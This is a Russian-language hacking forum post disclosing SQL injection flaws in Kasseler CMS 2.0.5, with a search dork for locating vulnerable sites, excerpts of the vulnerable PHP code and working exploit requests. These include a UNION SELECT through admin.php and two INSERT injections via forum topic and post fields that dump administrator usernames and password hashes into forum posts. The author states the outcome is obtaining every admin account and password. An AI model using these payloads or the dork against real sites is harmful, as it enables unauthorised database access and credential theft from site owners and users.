Тема: Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection
Показать сообщение отдельно

  #4  
Старый 26.08.2010, 02:04
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию
Тесты проводились на Kasseler CMS 2.0.5

Дорк: "by Kasseler CMS. All rights reserved"

Обычно при подстановки где-либо кавычек "'", выпадает 403 ошибка, потому лучше использовать без зависимостей.

Уязвимость: Sqli

Sources files => categories.php, admin.php

Need: Admin rights

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]edit_categories[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]){

global[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$adminfile[/COLOR][COLOR="#007700"];

 if(!empty([/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]warning[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_fetchrow[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT *, substr(tree,1,length(tree)-2) as parent FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]CAT[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE cid=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]));

...

[/COLOR][/COLOR
Экспплуатация:

admin.php

GET => module=categories&do=edit&id=-1 union select 1,2,table_name,4,5,6,7,8 from information_schema.tables--+

Уязвимость: Inject INSERT

Sources files => posting.php,

Need: -

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]
[/COLOR][COLOR="#007700"]...

if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'sendnewtopic'[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"].= ([/COLOR][COLOR="#0000BB"]$timeout[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() AND ![/COLOR][COLOR="#0000BB"]is_support[/COLOR][COLOR="#007700"]()) ?[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{TIME}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]time2string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$timeout[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()),[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'timeoutpost'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 if(empty([/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$_topic[/COLOR][COLOR="#007700"]= array(

[/COLOR][COLOR="#DD0000"]'forum_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'forum_id'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'topic_title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]149[/COLOR][COLOR="#007700"]),

[/COLOR][COLOR="#DD0000"]'topic_desc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'desc'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'topic_poster'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uid'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'topic_time'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"U"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]kr_date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d H:i:s"[/COLOR][COLOR="#007700"]))),

[/COLOR][COLOR="#DD0000"]'topic_poster_name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_name'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'ico'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ico'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'topic_views'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'topic_type'[/COLOR][COLOR="#007700"]=> empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]])?[/COLOR][COLOR="#DD0000"]"0"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]]

 );

 if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'sendnewtopic'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#FF8000"]//Создаем новую тему

[/COLOR][COLOR="#0000BB"]sql_insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_topic[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]TOPICS[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//Узнаем сгенерированный ID темы

[/COLOR][COLOR="#007700"]list([/COLOR][COLOR="#0000BB"]$topic_id[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_fetchrow[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT topic_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TOPICS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE topic_poster='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uid'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]' ORDER BY topic_id DESC LIMIT 1"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#FF8000"]//Создаем первое сообщение темы

[/COLOR][COLOR="#0000BB"]sql_insert[/COLOR][COLOR="#007700"](array(

[/COLOR][COLOR="#DD0000"]'topic_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$topic_id[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'forum_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'forum_id'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'poster_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uid'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'post_time'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"U"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]kr_date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d H:i:s"[/COLOR][COLOR="#007700"]))),

[/COLOR][COLOR="#DD0000"]'poster_ip'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'post_subject'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]149[/COLOR][COLOR="#007700"]),

[/COLOR][COLOR="#DD0000"]'post_text'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]bb[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'message'[/COLOR][COLOR="#007700"]]),

[/COLOR][COLOR="#DD0000"]'poster_name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_name'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'ico'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]magic_quotes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ico'[/COLOR][COLOR="#007700"]])

 ),[/COLOR][COLOR="#0000BB"]POSTS[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]add_points[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]points[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'forum_topic'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#FF8000"]//Узнаем сгенерированный ID сообщения

[/COLOR][COLOR="#007700"]list([/COLOR][COLOR="#0000BB"]$post_id[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_fetchrow[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT post_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]POSTS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE topic_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$topic_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]' AND poster_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uid'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]' ORDER BY post_id DESC LIMIT 1"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#FF8000"]//Обновляем информацию о теме

[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TOPICS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" SET topic_first_post_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$post_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]', topic_last_post_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$post_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]' WHERE topic_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$topic_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//Обновляем информацию о форуме

[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]FORUMS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" SET forum_posts=forum_posts+1, forum_topics=forum_topics+1, forum_last_post_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$post_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]' WHERE forum_id='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR
/index.php?module=forum&do=sendnewtopic&id=2

POST

title=\\&desc=, (select group_concat(user_name,0x3a,user_password) from k_users where user_level=2), 1, 4, 4, 0, 0, 0)#&message=, 5555555, 55, 1)#&type=0&ico=&uploaddir=uploads%2Fforum%2Ffileda ta-admin%2F&update_upload_options=true&x=83&y=19

Первый разпрос мы заканчиваем через GET desc => "desc=, (inject), 1, 4, 4, 0, 0, 0)#";

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]INSERT INTO[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]k_forum_topics[/COLOR][COLOR="#007700"]` (`[/COLOR][COLOR="#DD0000"]forum_id[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]topic_title[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]topic_desc[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]topic_poster[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]topic_time[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]topic_poster_name[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]ico[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]topic_views[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]topic_type[/COLOR][COLOR="#007700"]`)[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'2'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'\', '[/COLOR][COLOR="#007700"], ([/COLOR][COLOR="#0000BB"]select group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]user_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_password[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from k_users where user_level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#FF8000"]#', '1', '1282220945', 'admin', '', '0', '0');[/COLOR][/COLOR] 
Второй запрос мы заканчиваем через GET message => ", 5555555, 55, 1)#";

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]INSERT INTO[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]k_forum_posts[/COLOR][COLOR="#007700"]` (`[/COLOR][COLOR="#DD0000"]topic_id[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]forum_id[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]poster_id[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]post_time[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]poster_ip[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]post_subject[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]post_text[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]poster_name[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]ico[/COLOR][COLOR="#007700"]`)[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'62'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'2'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'1282220982'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'sdsdsdsd'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'\', '[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5555555[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]55[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#FF8000"]#', 'admin', '');[/COLOR][/COLOR] 
В "message" мы вписуем для того, чтобы выполнились UPDATE запросы после второго INSERT'a, и то что мы тут накалякали, отобразилось в созданном топике. Если второй INSERT == false, то наш встроенный "select" запрос будет виден только в базе, но на форуме такой темы создано не будет.

Вообщем на выходе получаем все админ аккаунты и их пароли.

Уязвимость: Inject INSERT

Sources files => posting.php,

Need: -

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]
[/COLOR][COLOR="#007700"]...

if(empty([/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"])){

 if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'sendnewpost'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#FF8000"]//Создаем новое сообщение

[/COLOR][COLOR="#0000BB"]$new_post_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_insert[/COLOR][COLOR="#007700"](array(

[/COLOR][COLOR="#DD0000"]'topic_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'topic_id'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'forum_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'forum_id'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'poster_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uid'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'post_time'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"U"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]kr_date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d H:i:s"[/COLOR][COLOR="#007700"]))),

[/COLOR][COLOR="#DD0000"]'poster_ip'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'post_subject'[/COLOR][COLOR="#007700"]=> !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]])?[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]149[/COLOR][COLOR="#007700"]):[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Re:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'topic_title'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]149[/COLOR][COLOR="#007700"])),

[/COLOR][COLOR="#DD0000"]'post_text'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]bb[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'message'[/COLOR][COLOR="#007700"]]),

[/COLOR][COLOR="#DD0000"]'poster_name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_name'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#DD0000"]'ico'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]magic_quotes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ico'[/COLOR][COLOR="#007700"]])

 ),[/COLOR][COLOR="#0000BB"]POSTS[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR
Экспплуатация:

index.php?module=forum&do=showtopic&id=[id]

Создаем сообщение на форуме:

Заголовок сообщения => "\";

Текст сообщения => ", (select group_concat(user_name,0x3a,user_password) from k_users where user_level=2), 55555, 333)#";

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]INSERT INTO[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]k_forum_posts[/COLOR][COLOR="#007700"]` (`[/COLOR][COLOR="#DD0000"]topic_id[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]forum_id[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]poster_id[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]post_time[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]poster_ip[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]post_subject[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]post_text[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]poster_name[/COLOR][COLOR="#007700"]`, `[/COLOR][COLOR="#DD0000"]ico[/COLOR][COLOR="#007700"]`)[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'65'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'2'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'1282224667'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'127.0.0.1'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'\', '[/COLOR][COLOR="#007700"], ([/COLOR][COLOR="#0000BB"]select group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]user_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_password[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from k_users where user_level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]55555[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]333[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#FF8000"]#', 'admin', '');[/COLOR][/COLOR] 
(с)v1d0q
 
Ответить с цитированием